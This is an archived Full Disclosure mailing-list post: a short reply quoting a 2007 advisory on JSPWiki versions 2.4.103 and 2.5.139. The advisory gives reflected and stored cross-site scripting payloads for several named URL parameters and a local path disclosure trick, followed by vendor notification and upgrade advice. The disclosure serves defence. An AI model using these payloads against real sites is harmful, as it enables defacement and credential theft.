Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: JSPWiki Multiple Input Validation Vulnerabilities

From: <full-disclosure () hushmail com>
Date: Wed, 26 Sep 2007 07:30:59 -0400
Nice!!!! 

JSPWiki 0day!



On Wed, 26 Sep 2007 00:35:53 -0400 Jason Kratzer 
<kratzer.jason () gmail com> wrote:

JSPWiki Multiple Input Validation Vulnerabilities

Application:  JSPWiki
Version:  2.4.103 and 2.5.139
BID:  25803
Credit:  Jason Kratzer
Date:  9/24/2007


Background
------------------------------------------------------------
JSPWiki is wiki software built around the standard J2EE components 
of
Java, servlets and JSP. It was written by Janne Jalkanen and 
released
under the LGPL. The Sun Java System Portal Server includes it as 
one
of its core applications. It is primarily used for company 
intranets
and has an active developer community, also including the i3G
Institute of the Heilbronn University.

(Courtesy of Wikipedia: http://en.wikipedia.org/wiki/JSPWiki)



Description
------------------------------------------------------------
Multiple Cross Site Scripting vulnerabilities have been discovered
within the JSPWiki application, successfully allowing an attacker 
to
steal credentials, falsify posts, and persistently deface portions 
of
the site.  Additionally, a Local Path Disclosure vulnerability was
also discovered.



Affected Versions
------------------------------------------------------------
Each vulnerability was confirmed in versions 2.4.103 and 2.5.139-
beta.
The Cross Site Scripting vulnerability affecting the redirect
parameter is only found in version 2.5.139-beta.



Proof of Concept

Cross Site Scripting Vulnerabilities:
------------------------------------------------------------
http://vulnerable-site.com/wiki/NewGroup.jsp?group=Test

  Vulnerable Parameters:
      group=Test"<script>alert("Test+XSS")</script>
      members= Test"<script>alert("Test+XSS")</script>

  Type: Reflective
------------------------------------------------------------
http://vulnerable-
site.com/wiki/Edit.jsp?page=Main&action=save&edittime=1186698299838
&addr=127.0.0.1&_editedtext=Test&changenote=Test&ok=Save

  Vulnerable Parameters:
      edittime=<script>alert("Test+XSS")</script>

  Type: Reflective
------------------------------------------------------------
http://vulnerable-
site.com/wiki/Comment.jsp?page=Main&action=save&edittime=1186698386
737&addr=127.0.0.1&_editedtext=Test&author=AnonymousCoward&link=&ok
=Save

  Vulnerable Parameters:
      edittime=<script>alert("Test+XSS")</script>
      author=<script>alert("Test+XSS")</script>
      link="><SCRIPT>alert("Test+XSS")</SCRIPT>

  Type: Reflective
------------------------------------------------------------
http://vulnerable-
site.com/wiki/UserPreferences.jsp?tab=profile&loginname=Test&passwo
rd=Test&password2=Test&wikiname=Test&fullname=Test&email=Test@Test.
com&ok=Save+profile&action=saveProfile
http://vulnerable-
site.com/wiki/Login.jsp?tab=profile&loginname=Test&password=Test&pa
ssword2=Test&wikiname=Test&fullname=Test&email=Test () Test com&ok=Sav
e+profile&action=saveProfile

  Vulnerable Parameters:
      loginname="><script>alert("Test+XSS")</script>
      wikiname="><script>alert("Test+XSS")</script>
      fullname="><script>alert("Test+XSS")</script>
      email="><script>alert("Test+XSS")</script>

  Type: Reflective
------------------------------------------------------------
http://vulnerable-site.com/wiki/Diff.jsp?page=Administrator&r1=-
1&r2=1

  Vulnerable Parameters:
      r1=<script>alert('Test XSS")</script>
      r2=<script>alert("Test+XSS")</script>

  Type: Reflective
------------------------------------------------------------
http://vulnerable-
site.com/wiki/PageInfo.jsp?page=SystemInfo/test.jpg

  Vulnerable Parameters:
      changenote=<script>alert("Test+XSS")</script>

  Type: Stored
------------------------------------------------------------
http://vulnerable-site.com/wiki-3/Login.jsp?redirect=Main

  Vulnerable Parameter:
      redirect="><script>alert("Test+XSS")</script>

Notes:
  The redirect parameter is found in multiple places through
JSPWiki-2.5.139-beta and is vulnerable in every instance.

------------------------------------------------------------

Local Path Disclosure:

http://vulnerable-site.com/wiki/attach/Main/Insert-Uploaded-
Attachment-Filename-Here?version=1000000
(Nonexistent #)

  Vulnerable Parameter;
      Version=10000000

Notes:
  The non-existent number must be between 1 and 10 character
otherwise a standard 500 error will be displayed.



Vendor Notification
------------------------------------------------------------
The JSPWiki project was notified on September 10, 2007.  Janne
Jalkanen developed and implemented a fix by September 18, 2007.



Remediation
------------------------------------------------------------
It is recommended to upgrade to JSPWiki version 2.4.104.  It is 
also
worth noting, the above vulnerabilities have also been fixed in 
the
beta release, version 2.5.139.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


--
Click here for to find products that will help grow your small business.
http://tagline.hushmail.com/fc/Ioyw6h4eDJa58QeqQZChgDR41kDBsOqlWnK9CObbwCzHOMDP3mf1yg/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: